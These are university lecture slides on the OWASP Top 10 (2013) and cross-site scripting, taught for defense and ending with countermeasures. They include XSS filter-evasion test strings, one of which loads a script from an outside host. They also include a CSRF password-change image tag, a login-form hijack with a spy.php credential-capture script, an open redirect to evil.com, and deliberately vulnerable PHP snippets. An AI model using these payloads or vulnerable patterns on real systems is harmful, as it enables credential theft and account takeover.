Advanced Web Technology
7) OWASP Top 10 Vulnerabilities & Cross Site Scripting
Emmanuel Benoist, Fall Term 2016-17
Berner Fachhochschule | Haute école spécialisée bernoise | Berne University of Applied Sciences
Web Security: Most Dangerous Vulnerabilities
- Security for Web Applications?
- Specificities of Web Applications
- Top 10 vulnerabilities
- Vulnerabilities vs. Attacks
- Conclusion
Security for Web Applications?
Introduction: Web Application Security?
What is a web application?
What is dangerous?
We will see some vulnerabilities (the ten that OWASP considers most critical)
Web Applications
Pure HTML web sites: do not exist any more!
Scripting languages (Perl / PHP / ASP): easy to learn, perfect for small projects, not designed for multi-tier applications
.NET / J2EE: based on a script language (ASP / JSP), allows the use of strong OO programming languages, makes the design of large (multi-tier) applications easy
Risks for Web Applications?
For the system: integrity of the system, reputation of the system, service interrupted, total destruction of the system, ...
For the user: identity theft, privacy breach, loss of money, account destruction or modification, destruction of one's own system (PC)
Specificities of Web Applications
Specificities of Web Applications
Available from anywhere in the world: attackers may be anywhere in the world
Based on specific protocols: mostly HTTP and HTTPS (and also streaming); well known and defined; they restrict the access points
Client - Server: the programmer writes code for both sides, but can only protect the server; the client can execute whatever it wants, so nothing the client sends can be trusted
Top 10 vulnerabilities
OWASP Top 10
Presents the 10 most critical web application security risks
Produced by the Open Web Application Security Project (OWASP); available on line at www.owasp.org
Updated in 2013
Not exhaustive: hundreds of other issues occur in web security, but it is focused on the most critical ones
OWASP Top 10, Version 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing function level access control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using components with known vulnerabilities
A10 - Unvalidated Redirects and Forwards
A1 - Injection
User-supplied data sent to an interpreter: SQL injection, interpreter injection (shell, XML, ...)
The attacker tricks the interpreter into executing unintended commands
Can control the database; can execute commands on the server
A2 - Broken Authentication and Session Management
Account credentials and session tokens are often not properly protected
A third party can then access someone else's account: the attacker compromises passwords, keys or session tokens
Risks: undermines authorization and accountability controls, causes privacy violations, identity theft
Method of attack: use weaknesses in the authentication mechanism: logout, password management, timeout, "remember me", ...
A3 - Cross Site Scripting - XSS
If the web site allows uncontrolled content to be supplied by users
Users can write content in a guest book or forum; a user can introduce malicious code in that content
Examples of malicious code: modification of the Document Object Model (DOM: change some links, add some buttons); sending personal information to third parties (JavaScript can send cookies to other sites)
A4 - Insecure Direct Object Reference
Occurs when the developer uses an HTTP parameter to refer to an internal object
For instance http://mysite.com/program.php?lang=fr
And in the program:
require_once($_REQUEST['lang']."lang.php");
The client controls the included file name (path traversal, or remote inclusion if the PHP configuration allows it).
Can also give access to other accounts, for instance http://mysite.com/program.php?page=124
It may be possible to change the page ID. The rights to see the page have to be tested for every request.
A5 - Security Misconfiguration
Process for keeping software up-to-date: OS, web / app server, DBMS
Is everything unnecessary disabled? ports, services, pages, accounts, privileges
Are default account passwords changed or disabled, before the first connection to the net?
Is your error handling set to prevent informative messages? stack traces, SQL errors
Are the security settings in your development frameworks (Struts, JSF, Spring, ASP.NET) and libraries understood and configured properly?
A repeatable process is required
A5 - Security Misconfiguration (Cont.)
The application relies on a framework (JSF, Struts, Spring); a flaw is found in the framework; an update is released; you don't install the update; attackers will use the known vulnerability
The application has a default admin page with a default password; you forget to remove the tool and to change the password; the attacker logs in using the default value
Directory listing is not disabled: the attacker can browse directories and find any file. He downloads Java .class files and decompiles them, then knows your code.
Access to "configuration" files not properly restricted: read the database configuration in a "password.inc" file in PHP
A6 - Sensitive Data Exposure
Giving access to unprotected data
Sensitive data should be appropriately protected: encryption and hashing of sensitive data is a MUST
Crypto should be taken seriously: no encryption (including no TLS) is a big risk; encryption is needed to store data securely
Example 1: credit card numbers stored in a database, encrypted automatically by the database and retrievable by SQL only. Vulnerable to SQL injection, since any query returns the plaintext. Solution: store them encrypted with a public key; only the backend program knows the private key needed to retrieve the information
Example 2: no SSL/TLS encryption after the login. The user's cookies can be stolen and reused for session hijacking. Solution: use TLS for all interactions with authenticated users, and mark cookies Secure so the browser sends them to HTTPS URLs only.
A6 - Sensitive Data Exposure (Cont.)
Example 3: passwords hashed without a salt. Hashed password data can be stolen (SQL injection or file upload flaw); the hashes can then be compared with precalculated hashes (rainbow tables)
Protection: encrypt all sensitive data at any time (even inside your internal network); discard sensitive data as soon as possible; use strong standard algorithms and keys; disable autocomplete for sensitive fields and caching of pages containing sensitive data
A7 - Missing Function Level Access Control
Users can access private information: anonymous users access private pages, regular users access privileged functions or data
Sensitive functionalities: some sites just hide the links or URLs from unauthorized users; attackers can access the URLs directly and gain access to protected areas
Example of a hidden address: /admin/adduser.php should only appear in the admin home page, but if it is not protected, any user can access it.
A7 - Missing Function Level Access Control (Cont.)
Code that evaluates privileges on the client rather than on the server: the privilege is tested in JavaScript before accessing a hidden address, but the attacker can read the code and find the address
A logged-in user accessing the data of another user: privileges are tested for functions, but not for data
Solutions:
Define precisely the roles and their rights; for each page, test the rights of the user; for each piece of data, test the rights to access it
A8 - Cross Site Request Forgery - CSRF
Forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application
The victim is logged on a system; the attacker has changed the content of a page the victim views (for instance: added a JavaScript command, or changed an image); this new command forces the browser (with the user's rights, since the browser attaches the session cookie) to access a resource, for instance logout or change password
The attacker gains the same privileges as the user: he can do everything that the user can
A8 - Cross Site Request Forgery (Cont.)
Example: we have a page changepassword.php which accepts the parameter newpassword=****
If the attacker adds the following image to the page
<img src="changepassword.php?newpassword=1234">
The password of the user may be changed!!!
This attack can be done from another server: the image can point to any URL
<img src="http://www.mysite.com/changepwd.php?newpwd=1234">
Provided that the user has a running session, the browser will do as asked.
A9 - Using components with known vulnerabilities
Normal programs use software and libraries: server, framework libraries, JavaScript libraries
Exploits are well known and can be exploited by automated tools, which expands the threat agent pool (script kiddies for instance)
Example 1: Apache CXF authentication bypass: failing to provide an identity token allowed invoking any web service with full permissions
Example 2: Spring remote code execution: abuse of the Expression Language (EL) to execute arbitrary code
A10 - Unvalidated Redirects and Forwards
If your program contains redirects (or forwards) whose target comes from a URL parameter, verify that the parameter is properly validated.
Possible attack: the application has a page called "redirect.php" which takes a parameter "url". The attacker can trick the user into being redirected to an evil page: http://www.example.com/redirect.php?url=evil.com
This can be used for phishing or to install malware.
Vulnerabilities vs. Attacks
Vulnerabilities vs. Attacks
We have presented vulnerabilities of web applications: the application AS IS offers entry points to some attacks; it is a way to see what has to be protected
Attacks often combine many vulnerabilities, and are also described at the level of their consequences
Example of Attacks
Phishing: attract the user to a web site while he thinks he is somewhere else; combines cross site scripting with weak or non-existent authentication or authorization checks
Privacy violation is the result of: poor validation, poor business rules, weak authorization checks
Identity theft
System compromise, data alteration, or data destruction
Security vs. Privacy Protection
Protecting web sites produces a lot of logs; log file analysis => attacker detection
Protection of legitimate users' privacy: the EU directive on Data Protection protects the privacy of citizens; it may be illegal to log that much data
Trade-off: what should be stored? Define a privacy policy; encrypt the log files; authorize only a restricted number of persons to access the logs; destroy logs after some time (according to your data retention policy).
Conclusion
Conclusion
Web security belongs to security: encryption, testing of inputs, teaching of users
It is somehow different: restricted entry point (port 80, and 443 for HTTPS: may be easier to protect); open infrastructure (anybody can visit and attack); international architecture; no control on the client
Cross Site Scripting - XSS
- Presentation: Inject JavaScript in a Page
- JavaScript for manipulating the DOM
- XSS Factsheets
- Countermeasures
Presentation: Inject JavaScript in a Page
Cross Site Scripting - XSS
If the web site allows uncontrolled content to be supplied by users
Users can write content in a guest book or forum; a user can introduce malicious code in that content
Examples of malicious code: modification of the Document Object Model (DOM: change some links, add some buttons); sending personal information to third parties (JavaScript can send cookies to other sites)
Modus Operandi
The attacker executes a script on the victim's machine: usually JavaScript, but it can be any script language supported by the victim's browser
Three types of cross site scripting: reflected, stored, DOM-based
Reflected XSS
The easiest exploit
A page reflects user-supplied data directly back to the user:
echo $_REQUEST['userinput'];
So when the user types:
<script type="text/javascript">alert("Hello World");</script>
he receives an alert in his browser.
Danger: if the URL (containing the GET parameters) is delivered by a third party to the victim, the victim will see a modified page, while the SSL certificate is valid and no security warning appears!!!
Stored XSS
Hostile data is taken and stored: in a file, in a database, or in any other backend system
Then the data is sent back to any visitor of the web site
Risk when a large number of users can see unfiltered content
Very dangerous for content management systems (CMS), blogs, forums
DOM Based XSS
Document Object Model: the document is represented using a tree; the tree is rooted at the document node; each tag and text is part of the tree
XSS modifies the Document Object Model (DOM): JavaScript can manipulate the whole document; it can create new nodes, remove existing nodes, change the content of some nodes
In DOM-based XSS the page's own JavaScript reads attacker-controlled data (for instance from the URL) and writes it into the DOM; the payload need never reach the server
Real XSS attacks are a mix of the three types
To be efficient an attacker combines the types: the attacker logs on the system, types his malicious content, the content is stored on the server (often in a database), and when a user visits the site his DOM is manipulated
Target: send information to another site, or to another part of the site
JavaScript for manipulating the DOM
Document Object Model: HTML is converted into a tree
<html>
<body>
  <div id="header">
    <h1>Title of the page</h1>
  </div>
  <div id="menu">
    <ul id="menu-list">
      <li class="menuitem"><a href="index.php?id=1">One</a></li>
      <li class="menuitem"><a href="index.php?id=2">Two</a></li>
      <li class="menuitem"><a href="index.php?id=3">Three</a></li>
    </ul>
  </div>
  <div id="content">
    <p>Hello World</p>
  </div>
</body>
</html>
Document Object Model (Cont.)
JavaScript can manipulate the DOM
Create a new node and insert it in the tree:
var newli = document.createElement("li");
var newtxtli = document.createTextNode("Four");
newli.appendChild(newtxtli);
document.getElementById("menu-list").appendChild(newli);
Delete a node:
var firstchild = document.getElementById("menu-list").firstChild;
document.getElementById("menu-list").removeChild(firstchild);
Modify a node (here: replace a button's click handler with another function):
document.getElementById("addbutton").onclick = otherFunction;
Spy the content of a form
The spy remains unnoticed by the user
Suppose a page contains such a form:
<form action="login.php" method="POST" id="login-form">
Username <input type="text" name="username">,
Password <input type="password" name="password">
</form>
If the following JavaScript is injected in the page:
document.getElementById("login-form").action = "spy.php";
And spy.php looks like:
<?php
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
// Save data in a database or a file
// Then forward the victim to the real login page, so the login still succeeds
$newURL = "http://www.mysite.de/login.php";
$newURL .= "?username=$username&password=$password";
header("Location: $newURL");
AJAX: Asynchronous JavaScript and XML
JavaScript is used for interacting with the client: the client receives the page from the server; JavaScript handles events, reacts to key down, value changed, mouse-over, etc.
JavaScript establishes an asynchronous communication with the server: creates an XMLHttpRequest object, sends a request to the server (without refreshing the page), modifies the page according to the data received from the server
Connect another server
The "Same Origin Policy" prevents connecting to another server
Script in a page may talk only to the origin (scheme, host and port) the page was loaded from (with document.domain, also to other hosts of the same parent domain); JavaScript is allowed to send XMLHttpRequests only to the server of the page
The attacker wants to receive information elsewhere: modify the DOM to insert a new resource (an image or a script) whose URL points to the attacker's server and carries the information in the request, since image and script loads are not restricted by the same origin policy; if the resource is a script, its content is executed, so two-way communication is possible!!!
XSS Factsheets
Testing Strategy
Suppress any JavaScript in posts
Test if a post contains a JavaScript instruction: quite hard, it can be hidden.
Examples of JavaScript instructions
JavaScript in a <script> tag (the normal way):
<script type="text/javascript">// Here comes the script</script>
Or from an external file (source: http://ha.ckers.org/xss.html):
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
JavaScript as event handler:
<span onmouseover="alert(10);">Test 1</span>
JavaScript as URL:
<a href="javascript:alert('XSS');">Test 3</a>
Examples of tests
The following XSS test strings (source: http://ha.ckers.org/xss.html) can be inserted in pages, to test if the protection is in order:
XSS locator: a mix of special characters; whichever come back unencoded shows what the filter lets through
'';!--"<XSS>=&{()}
Loads the file xss.js from the attacker's server
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
A fake image whose source is a javascript: URL (executed by old browsers only; current browsers ignore it)
<IMG SRC="javascript:alert('XSS');">
Examples of tests (Cont.)
The same instruction with the first letter written as a decimal HTML character reference (the cheat sheet lists this under "UTF-8 encoding"), to evade a filter that searches for the string "javascript"
<IMG SRC=&#106;avascript:alert('XSS')>
Adding some extra angle brackets circumvents filters that strip a single tag
<<SCRIPT>alert("XSS");//<</SCRIPT>
Without any javascript: URL at all: an event handler
<BODY ONLOAD=alert('XSS')>
Using the meta tag
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
Countermeasures
Protection: a combination of
Whitelist validation of all incoming data: allows the detection of attacks
Appropriate encoding of all output data: prevents any successfully injected script from running in the browser
Input Validation
Use a standard input validation mechanism: validate length, type, syntax and business rules
Use "accept known good" validation: reject invalid input, do not attempt to sanitize potentially hostile data, and do not forget that error messages might also echo the invalid data
Strong Output Encoding
Ensure that all user-supplied data is appropriately entity encoded before rendering
HTML or XML entities depending on the output mechanism: <script> becomes &lt;script&gt;
Encode all characters other than a very limited subset
Set the character encoding for each page you output: specify the character encoding (e.g. ISO 8859-1 or UTF-8); do not allow the attacker to choose this for your users
Language Specific Recommendations
Java: use the Struts or JSF output validation and output mechanisms, or use the JSTL escapeXML="true" attribute in <c:out ...>; do not use <%= %>
.NET: use the Microsoft Anti-XSS Library
PHP: ensure output is passed through htmlentities() or htmlspecialchars() (with ENT_QUOTES and the page's charset, so that single quotes are encoded too)
You can also use the ESAPI library developed by OWASP: content is first validated, then canonicalize()d to be stored; the output is then encoded using encodeForHTML(), encodeForHTMLAttribute() or encodeForJavaScript() (depending on the context).
Decoding / Encoding Untrusted Data (figure; source: Javadoc documentation of the ESAPI package)
Conclusion: Cross Site Scripting
The attacker injects input in a page: stored data in pages where many users can send input (CMS, guest book, etc.), or reflected XSS in a field that is displayed to the user.
JavaScript takes control of the victim's browser: it can manipulate the Document Object Model (modify the page) and send information to a third server
Countermeasures: validation of input (rejection of anything that could be invalid) and encoding of output.
References
OWASP Top 10 - 2013: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
A Guide for Building Secure Web Applications and Web Services: http://www.owasp.org/index.php/Category:OWASP_Guide_Project
XSS (Cross Site Scripting) Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet